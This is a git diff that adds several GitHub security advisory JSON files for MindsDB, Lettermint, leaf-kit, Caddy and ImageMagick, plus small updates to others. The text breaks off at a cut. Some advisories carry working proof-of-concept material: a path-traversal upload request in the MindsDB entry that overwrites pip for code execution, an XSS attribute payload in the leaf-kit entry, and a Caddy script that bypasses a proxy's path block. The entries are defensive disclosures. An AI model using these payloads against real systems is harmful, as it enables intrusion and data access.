b/advisories/github-reviewed/2026/02/GHSA-4894-xqv6-vrfq/GHSA-4894-xqv6-vrfq.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4894-xqv6-vrfq", + "modified": "2026-02-24T20:07:59Z", + "published": "2026-02-24T20:07:58Z", + "aliases": [ + "CVE-2026-27483" + ], + "summary": "MindsDB: Path Traversal in /api/files Leading to Remote Code Execution", + "details": "### Summary\n\nThere is a path traversal vulnerability in Mindsdb's /api/files interface, which an authenticated attacker can exploit to achieve remote command execution.\n\n### Details\n\nThe vulnerability exists in the \"Upload File\" module, which corresponds to the API endpoint /api/files. The affected code is located at mindsdb/api/http/namespaces/file.py:\n```python\n@ns_conf.route(\"/\")\n@ns_conf.param(\"name\", \"MindsDB's name for file\")\nclass File(Resource):\n @ns_conf.doc(\"put_file\")\n @api_endpoint_metrics('PUT', '/files/file')\n def put(self, name: str):\n \"\"\"add new file\n params in FormData:\n - file\n - original_file_name [optional]\n \"\"\"\n\n data = {}\n mindsdb_file_name = name\n\n existing_file_names = ca.file_controller.get_files_names()\n\n def on_field(field):\n name = field.field_name.decode()\n value = field.value.decode()\n data[name] = value\n\n file_object = None\n\n def on_file(file):\n nonlocal file_object\n data[\"file\"] = file.file_name.decode()\n file_object = file.file_object\n\n temp_dir_path = tempfile.mkdtemp(prefix=\"mindsdb_file_\")\n\n if request.headers[\"Content-Type\"].startswith(\"multipart/form-data\"):\n parser = multipart.create_form_parser(\n headers=request.headers,\n on_field=on_field,\n on_file=on_file,\n config={\n \"UPLOAD_DIR\": temp_dir_path.encode(), # bytes required\n \"UPLOAD_KEEP_FILENAME\": True,\n \"UPLOAD_KEEP_EXTENSIONS\": True,\n \"MAX_MEMORY_FILE_SIZE\": 0,\n },\n )\n\n while True:\n chunk = request.stream.read(8192)\n if not chunk:\n break\n parser.write(chunk)\n parser.finalize()\n parser.close()\n\n if file_object is not None:\n if not file_object.closed:\n try:\n file_object.flush()\n except (AttributeError, ValueError, OSError):\n logger.debug(\"Failed to flush file_object before closing.\", exc_info=True)\n file_object.close()\n file_object = None\n else:\n data = request.json\n```\nSince the multipart file upload does not perform security checks on the uploaded file path, an attacker can perform path traversal by using ../ sequences in the filename field. The file write operation occurs before calling clear_filename and save_file, meaning there is no filtering of filenames or file types, allowing arbitrary content to be written to any path on the server.\n\n\n### PoC\n\nThis vulnerability can be exploited to overwrite existing executable files, which retain their executable permissions after being overwritten. In addition to conventional file upload exploitation methods, we provide a way to achieve Remote Code Execution (RCE) by leveraging MindsDB's own functionality.\n\nThe API endpoint //install is used to install handlers, which internally calls install_dependencies to install dependencies via pip. This function executes pip using subprocess.Popen. Therefore, an attacker can:\n\n1. Exploit the vulnerability to overwrite /venv/lib/python3.10/site-packages/pip/__init__.py with a malicious Python script.\n2. Trigger the execution of the malicious script by calling //install, which invokes pip.\n \nExploit:\n```\nPUT /api/files/mm HTTP/1.1\nHost: ip:47334\nContent-Length: 579\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36\nAccept: application/json, text/plain, */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryv9dZC0cAHLlHSHD9\nOrigin: http://ip:47334\nReferer: http://ip:47334/fileUpload\nAccept-Encoding: gzip, deflate, br\nAccept-Language: zh,en;q=0.9,zh-CN;q=0.8\nCookie: bid=87948125-5042-4fc8-a692-9cbf71e387be\nConnection: keep-alive\n\n------WebKitFormBoundaryv9dZC0cAHLlHSHD9\nContent-Disposition: form-data; name=\"name\"\n\nmm\n------WebKitFormBoundaryv9dZC0cAHLlHSHD9\nContent-Disposition: form-data; name=\"source\"\n\nmm\n------WebKitFormBoundaryv9dZC0cAHLlHSHD9\nContent-Disposition: form-data; name=\"source_type\"\n\nfile\n------WebKitFormBoundaryv9dZC0cAHLlHSHD9\nContent-Disposition: form-data; name=\"file\"; filename=\"../../../../../../venv/lib/python3.10/site-packages/pip/__init__.py\"\nContent-Type: text/plain\n\nimport os\nos.system(\"touch /tmp/rce_by_hacker\")\n------WebKitFormBoundaryv9dZC0cAHLlHSHD9--\n```\nAfter sending this request, you can observe the logs in Docker's output:\n```\n2025-05-30 02:26:52,432 http INFO python_multipart.multipart: Opening a file on disk\n2025-05-30 02:26:52,433 http INFO python_multipart.multipart: Saving with filename in: b'/root/mdb_storage/tmp/mindsdb_byom_file_89h0zcz0'\n2025-05-30 02:26:52,433 http INFO python_multipart.multipart: Opening file: b'/root/mdb_storage/tmp/mindsdb_byom_file_89h0zcz0/../../../../../../venv/lib/python3.10/site-packages/pip/__init__.py'\n```\nAt this point, you can see that the file has been successfully overwritten:\n```\nroot@e445c93b2fd5:/mindsdb# cat /venv/lib/python3.10/site-packages/pip/__init__.py\nimport os\nos.system(\"touch /tmp/rce_by_hacker\")\n```\nAfterwards, install any handler in the UI, and you will see that the file rce_by_hacker is successfully created in the /tmp directory. The same result can also be achieved by sending an API request to trigger it.\n\n### Credit\n\nThis vulnerability was discovered by:\n- XlabAI Team of Tencent Xuanwu Lab\n- Atuin Automated Vulnerability Discovery Engine\n\nIf there are any questions regarding the vulnerability details, please feel free to reach out to MindsDB for further discussion at xlabai@tencent.com.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "mindsdb" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "25.9.1.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/mindsdb/mindsdb/security/advisories/GHSA-4894-xqv6-vrfq" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27483" + }, + { + "type": "WEB", + "url": "https://github.com/mindsdb/mindsdb/commit/87a44bdb2b97f963e18f10a068e1a1e2690505ef" + }, + { + "type": "PACKAGE", + "url": "https://github.com/mindsdb/mindsdb" + }, + { + "type": "WEB", + "url": "https://github.com/mindsdb/mindsdb/releases/tag/v25.9.1.1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-24T20:07:58Z", + "nvd_published_at": "2026-02-24T15:21:38Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-49pc-8936-wvfp/GHSA-49pc-8936-wvfp.json b/advisories/github-reviewed/2026/02/GHSA-49pc-8936-wvfp/GHSA-49pc-8936-wvfp.json new file mode 100644 index 0000000000000..3e50474af8813 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-49pc-8936-wvfp/GHSA-49pc-8936-wvfp.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-49pc-8936-wvfp", + "modified": "2026-02-23T22:30:18Z", + "published": "2026-02-20T21:14:49Z", + "aliases": [ + "CVE-2026-27492" + ], + "summary": "Lettermint Node.js SDK leaks email properties to unintended recipients when client instance is reused", + "details": "### Impact\nEmail properties (such as to, subject, html, text, and attachments) are not reset between sends when a single client instance is reused across multiple .send() calls. This can cause properties from a previous send to leak into a subsequent one, potentially delivering content or recipient addresses to unintended parties. Applications sending emails to different recipients in sequence — such as transactional flows like password resets or notifications — are affected.\n\n### Patches\nYes, the issue has been patched. Users should upgrade to v1.5.1 or later.\n\n### Workarounds\nIf upgrading immediately is not possible, instantiate a new client for each send:\n```js\nconst client = new Lettermint({ apiKey: process.env.LETTERMINT_API_KEY });\nawait client.email.to('...').subject('...').html('...').send();\n```\n\nThis ensures no state is carried over between sends.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "lettermint" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.5.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/lettermint/lettermint-node/security/advisories/GHSA-49pc-8936-wvfp" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27492" + }, + { + "type": "WEB", + "url": "https://github.com/lettermint/lettermint-node/commit/24a17acbc2429c5eb30391f9df3dc0ea7aaf4de1" + }, + { + "type": "PACKAGE", + "url": "https://github.com/lettermint/lettermint-node" + }, + { + "type": "WEB", + "url": "https://github.com/lettermint/lettermint-node/blob/main/CHANGELOG.md#151-2026-02-20" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-488" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-20T21:14:49Z", + "nvd_published_at": "2026-02-21T11:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-4chv-4c6w-w254/GHSA-4chv-4c6w-w254.json b/advisories/github-reviewed/2026/02/GHSA-4chv-4c6w-w254/GHSA-4chv-4c6w-w254.json index 9ce39d9038fa0..b1103d27602d6 100644 --- a/advisories/github-reviewed/2026/02/GHSA-4chv-4c6w-w254/GHSA-4chv-4c6w-w254.json +++ b/advisories/github-reviewed/2026/02/GHSA-4chv-4c6w-w254/GHSA-4chv-4c6w-w254.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4chv-4c6w-w254", - "modified": "2026-02-17T21:29:05Z", + "modified": "2026-02-19T21:56:47Z", "published": "2026-02-17T21:29:05Z", "aliases": [ "CVE-2026-26267" @@ -87,6 +87,10 @@ "type": "WEB", "url": "https://github.com/stellar/rs-soroban-sdk/security/advisories/GHSA-4chv-4c6w-w254" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26267" + }, { "type": "WEB", "url": "https://github.com/stellar/rs-soroban-sdk/pull/1729" @@ -115,6 +119,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-17T21:29:05Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T20:25:43Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-4hfh-fch3-5q7p/GHSA-4hfh-fch3-5q7p.json b/advisories/github-reviewed/2026/02/GHSA-4hfh-fch3-5q7p/GHSA-4hfh-fch3-5q7p.json new file mode 100644 index 0000000000000..a079fd9c57ac1 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-4hfh-fch3-5q7p/GHSA-4hfh-fch3-5q7p.json @@ -0,0 +1,67 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4hfh-fch3-5q7p", + "modified": "2026-02-23T22:21:47Z", + "published": "2026-02-19T19:40:08Z", + "aliases": [ + "CVE-2026-27120" + ], + "summary": "Leaf-kit html escaping does not work on characters that are part of extended grapheme cluster", + "details": "### Summary\n\n`htmlEscaped` in leaf-kit will only escape html special characters if the extended grapheme clusters match, which allows bypassing escaping by using an extended grapheme cluster containing both the special html character and some additional characters. In the case of html attributes, this can lead to XSS if there is a leaf variable in the attribute that is user controlled.\n\n### Details\n\nRelevant code:\nhttps://github.com/vapor/leaf-kit/blob/main/Sources/LeafKit/String%2BHTMLEscape.swift#L14\n\nStrings in Swift are based on extended grapheme clusters. HTML on the other hand is based on unicode characters. \n\nFor example if you have the sequence \"́ (U+0022 Quotation mark followed by U+0301 Combining Acute Accent). To HTML this is just a quote mark followed by some other random character. To swift this is one extended grapheme cluster that does not equal a quotation mark by itself which is a different extended grapheme cluster.\n\nThus `\"\\\"́\".replacingOccurrences(of: \"\\\"\", with: \""\")` does not replace the quote mark. This allows you to break out of html attributes.\n\nI believe replacingOccurences takes an optional third parameter that allows you to specify options to make it work on UTF-8 characters instead of grapheme clusters, which would be a good fix for this issue.\n\nI see depending on version, leafkit might use `replacing` instead of `replacingOccurences`. I don't know swift that well and couldn't find docs on what replacing does, so I don't know if both versions of the function are affected. The version of swift i was testing on I believe was using replacingOccurences\n\nIt seems like replacingOccurences will skip past prefix characters of extended grapheme clusters, which is what would be needed in order to meaningfully bypass esaping of <. Thus i think this is mostly limited to attributes and not general text.\n\n### PoC\n\nAn example vapor application that is vulnerable might look like\n\nroutes.swift\n```swift\nimport Vapor\n\nstruct Hello: Content {\n var msg: String?\n}\n\nfunc routes(_ app: Application) throws {\n app.post { req throws in\n\tlet Hello = try req.content.decode(Hello.self)\n return req.view.render(\"hello\", [\n \"msg\": Hello.msg ?? \"Hello World!\"\n ])\n }\n}\n```\n\nWith a hello.leaf that looks like\n```\n
Hover to see message
\n```\n\nAnd then you POST something like `msg=%22%cc%81=1%20autofocus%20tabindex=0%20onfocus=alert(1)%20`\n\n### Impact\nIf a website uses leaf to escape an attribute value based on user input, the attacker may be able to insert a malicious attribute. If a site is not using a secure CSP policy, then this can be used to execute malicious javascript (XSS). Impact is context dependent if a site is using a secure CSP policy.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "SwiftURL", + "name": "leaf-kit" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.4.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/vapor/leaf-kit/security/advisories/GHSA-4hfh-fch3-5q7p" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27120" + }, + { + "type": "WEB", + "url": "https://github.com/vapor/leaf-kit/commit/8919e39476c3a4ba05c28b71546bb9195f87ef34" + }, + { + "type": "PACKAGE", + "url": "https://github.com/vapor/leaf-kit" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-75", + "CWE-79", + "CWE-87" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-19T19:40:08Z", + "nvd_published_at": "2026-02-20T22:16:29Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-4hg8-92x6-h2f3/GHSA-4hg8-92x6-h2f3.json b/advisories/github-reviewed/2026/02/GHSA-4hg8-92x6-h2f3/GHSA-4hg8-92x6-h2f3.json index 3de18c6a5137c..0b9184be45e10 100644 --- a/advisories/github-reviewed/2026/02/GHSA-4hg8-92x6-h2f3/GHSA-4hg8-92x6-h2f3.json +++ b/advisories/github-reviewed/2026/02/GHSA-4hg8-92x6-h2f3/GHSA-4hg8-92x6-h2f3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4hg8-92x6-h2f3", - "modified": "2026-02-17T21:40:47Z", + "modified": "2026-02-20T16:44:19Z", "published": "2026-02-17T21:40:46Z", "aliases": [ "CVE-2026-26319" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4hg8-92x6-h2f3" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26319" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/29b587e73cbdc941caec573facd16e87d52f007b" @@ -64,6 +68,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-17T21:40:46Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T23:16:24Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-4xrr-hq4w-6vf4/GHSA-4xrr-hq4w-6vf4.json b/advisories/github-reviewed/2026/02/GHSA-4xrr-hq4w-6vf4/GHSA-4xrr-hq4w-6vf4.json new file mode 100644 index 0000000000000..028ca0ae221b7 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-4xrr-hq4w-6vf4/GHSA-4xrr-hq4w-6vf4.json @@ -0,0 +1,80 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4xrr-hq4w-6vf4", + "modified": "2026-02-24T20:16:56Z", + "published": "2026-02-24T20:16:55Z", + "aliases": [ + "CVE-2026-27585" + ], + "summary": "Caddy: Improper sanitization of glob characters in file matcher may lead to bypassing security protections", + "details": "### Summary\n\nThe path sanitization in [file matcher](https://github.com/caddyserver/caddy/blob/68d50020eef0d4c3398b878f17c8092ca5b58ca0/modules/caddyhttp/fileserver/matcher.go#L361) doesn't sanitize backslashes which can lead to bypassing path related security protections.\n\n### Details\n\nThe [try_files](https://caddyserver.com/docs/caddyfile/directives/try_files) directive is used to rewrite the request uri. It accepts a list of patterns and checks if any files exist in the root that match the provided patterns. It's commonly used in Caddy configs. For example, it's used in SPA applications to rewrite every route that doesn't exist as a file to `index.html`. \n \n```caddy\nexample.com {\n\troot * /srv\n\tencode\n\ttry_files {path} /index.html\n\tfile_server\n}\n```\n\n`try_files` patterns are actually glob patterns and file matcher expands them. The `{path}` in the pattern is replaced with\nthe request path and then [is expanded by `fs.Glob`](https://github.com/caddyserver/caddy/blob/68d50020eef0d4c3398b878f17c8092ca5b58ca0/modules/caddyhttp/fileserver/matcher.go#L398). The request path is sanitized before being placed inside the pattern and the special chars are escaped . [The following code](https://github.com/caddyserver/caddy/blob/68d50020eef0d4c3398b878f17c8092ca5b58ca0/modules/caddyhttp/fileserver/matcher.go#L361) is the sanitization part. \n\n```go\nvar globSafeRepl = strings.NewReplacer(\n\t\"*\", \"\\\\*\",\n\t\"[\", \"\\\\[\",\n\t\"?\", \"\\\\?\",\n)\n\nexpandedFile, err := repl.ReplaceFunc(file, func(variable string, val any) (any, error) {\n if runtime.GOOS == \"windows\" {\n return val, nil\n }\n switch v := val.(type) {\n case string:\n return globSafeRepl.Replace(v), nil\n case fmt.Stringer:\n return globSafeRepl.Replace(v.String()), nil\n }\n return val, nil\n})\n```\n\nThe problem here is that it does not escape backslashes. `/something-\\*/` can match a file named `something-\\-anything.txt`, but it should not. The primitive that this vulnerability provides is not very useful, as it only allows an attacker to guess filenames that contain a backslash and they should also know the characters before that backslash.\n\nThe backslash is mainly used to escape special characters in glob patterns, but when it appears before non special characters, it is ignored. This means that `h\\ello*` matches `hello world` even though `e` is not a special character. This behavior can be abused to bypass path protections that might be in place. For example, if there is a reverse proxy that only allows `/documents/*` to the internal network and its upstream is a Caddy server that uses `try_files`, the reverse proxy's protection can be bypassed by requesting the path `/do%5ccuments/`.\n\nSome configurations that implement blacklisting and serving together in Caddy are also vulnerable but there's a condition that the `try_files` directive and the filtering `route`/`handle` must not be in a same block because `try_files` directive [executes before `route` and `handle` directives](https://caddyserver.com/docs/caddyfile/directives#directive-order). \n\nFor example the following config isn't vulnerable.\n\n```caddy\n:80 {\n root * /srv\n\n route /documents/* {\n respond \"Access denied\" 403\n }\n\n try_files {path} /index.html\n file_server\n}\n```\n\nBut this one is vulnerable.\n\n```caddy\n:80 {\n root * /srv\n\n route /documents/* {\n respond \"Access denied\" 403\n }\n\n route /* {\n try_files {path} /index.html\n }\n file_server\n}\n```\n\nThis config is also vulnerable because `Header` directives executes before `try_files`. \n\n```caddy\n:80 {\n root * /srv \n header /uploads/* {\n X-Content-Type-Options \"nosniff\"\n Content-Security-Policy \"default-src 'none';\"\n }\n try_files {path} /index.html\n file_server\n}\n```\n\n### PoC\n\nPaste this script somewhere and run it. It should print \"some content\" which means that the nginx protection has failed.\n\n```bash\n#!/bin/bash\n\nmkdir secret\necho 'some content' > secret/secret.txt\n\ncat > Caddyfile <<'EOF'\n:80 {\n root * /srv\n\n try_files {path} /index.html\n file_server\n}\nEOF\n\ncat > nginx.conf <<'EOF'\nevents {}\n\nhttp {\n server {\n listen 80;\n \n location /secret {\n return 403;\n }\n\n location / {\n proxy_pass http://caddy;\n proxy_set_header Host $host;\n }\n }\n}\nEOF\n\ncat > docker-compose.yml <<'EOF'\nservices:\n caddy:\n # caddy@sha256:c3d7ee5d2b11f9dc54f947f68a734c84e9c9666c92c88a7f30b9cba5da182adb\n image: caddy:latest\n volumes:\n - ./Caddyfile:/etc/caddy/Caddyfile:ro\n - ./secret:/srv/secret:ro\n nginx:\n # nginx@sha256:341bf0f3ce6c5277d6002cf6e1fb0319fa4252add24ab6a0e262e0056d313208\n image: nginx:latest\n volumes:\n - ./nginx.conf:/etc/nginx/nginx.conf:ro\n ports:\n - \"8000:80\" \nEOF\n\ndocker compose up -d\ncurl 'localhost:8000/secre%5ct/secret.txt'\n```\n\n### Impact\n\nThis vulnerability may allow an attacker to bypass security protections. It affects users with specific Caddy and environment configurations.\n\n### AI Usage\n\nAn LLM was used to polish this report.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/caddyserver/caddy/v2/modules/caddyhttp/fileserver" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.11.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "< 2.11.0" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/caddyserver/caddy/security/advisories/GHSA-4xrr-hq4w-6vf4" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27585" + }, + { + "type": "WEB", + "url": "https://caddyserver.com/docs/caddyfile/directives#directive-order" + }, + { + "type": "PACKAGE", + "url": "https://github.com/caddyserver/caddy" + }, + { + "type": "WEB", + "url": "https://github.com/caddyserver/caddy/blob/68d50020eef0d4c3398b878f17c8092ca5b58ca0/modules/caddyhttp/fileserver/matcher.go#L361" + }, + { + "type": "WEB", + "url": "https://github.com/caddyserver/caddy/blob/68d50020eef0d4c3398b878f17c8092ca5b58ca0/modules/caddyhttp/fileserver/matcher.go#L398" + }, + { + "type": "WEB", + "url": "https://github.com/caddyserver/caddy/releases/tag/v2.11.1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-24T20:16:55Z", + "nvd_published_at": "2026-02-24T17:29:03Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-543g-8grm-9cw6/GHSA-543g-8grm-9cw6.json b/advisories/github-reviewed/2026/02/GHSA-543g-8grm-9cw6/GHSA-543g-8grm-9cw6.json new file mode 100644 index 0000000000000..4906b1a41a33a --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-543g-8grm-9cw6/GHSA-543g-8grm-9cw6.json @@ -0,0 +1,411 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-543g-8grm-9cw6", + "modified": "2026-02-24T15:37:53Z", + "published": "2026-02-24T15:37:53Z", + "aliases": [ + "CVE-2026-25799" + ], + "summary": "ImageMagick has Division-by-Zero in YUV sampling factor validation, which leads to crash", + "details": "A logic error in YUV sampling factor validation allows an invalid sampling factor to bypass checks and trigger a division-by-zero during image loading, resulting in a reliable denial-of-service.\n\n```\ncoders/yuv.c:210:47: runtime error: division by zero\nAddressSanitizer:DEADLYSIGNAL\n=================================================================\n==3543373==ERROR: AddressSanitizer: UNKNOWN SIGNAL on unknown address 0x000000000000 (pc 0x55deeb4d723c bp 0x7fffc28d34d0 sp 0x7fffc28d3320 T0)\n #0 0x55deeb4d723c in ReadYUVImage coders/yuv.c:210\n #1 0x55deeb751dff in ReadImage MagickCore/constitute.c:743\n #2 0x55deeb756374 in ReadImages MagickCore/constitute.c:1082\n #3 0x55deec682375 in CLINoImageOperator MagickWand/operation.c:4959\n #4 0x55deec6887ed in CLIOption MagickWand/operation.c:5473\n #5 0x55deec32843b in ProcessCommandOptions MagickWand/magick-cli.c:653\n #6 0x55deec32b99b in MagickImageCommand MagickWand/magick-cli.c:1392\n #7 0x55deec324d58 in MagickCommandGenesis MagickWand/magick-cli.c:177\n #8 0x55deead82519 in MagickMain utilities/magick.c:162\n #9 0x55deead828be in main utilities/magick.c:193\n #10 0x7fb90807fd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58\n #11 0x7fb90807fe3f in __libc_start_main_impl ../csu/libc-start.c:392\n #12 0x55deead81974 in _start (/data/ylwang/LargeScan/targets/ImageMagick/utilities/magick+0x22fb974)\n\nAddressSanitizer can not provide additional info.\nSUMMARY: AddressSanitizer: UNKNOWN SIGNAL coders/yuv.c:210 in ReadYUVImage\n==3543373==ABORTING\n```", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-AnyCPU" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-HDRI-AnyCPU" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-HDRI-OpenMP-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-HDRI-OpenMP-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-HDRI-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-HDRI-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-HDRI-x86" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-OpenMP-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-OpenMP-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-OpenMP-x86" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-x86" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q8-AnyCPU" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q8-OpenMP-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q8-OpenMP-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q8-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q8-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q8-x86" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.10.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-543g-8grm-9cw6" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25799" + }, + { + "type": "WEB", + "url": "https://github.com/ImageMagick/ImageMagick/commit/49000e7298fbfdd759ac2c46f740f40c2e9b7452" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ImageMagick/ImageMagick" + }, + { + "type": "WEB", + "url": 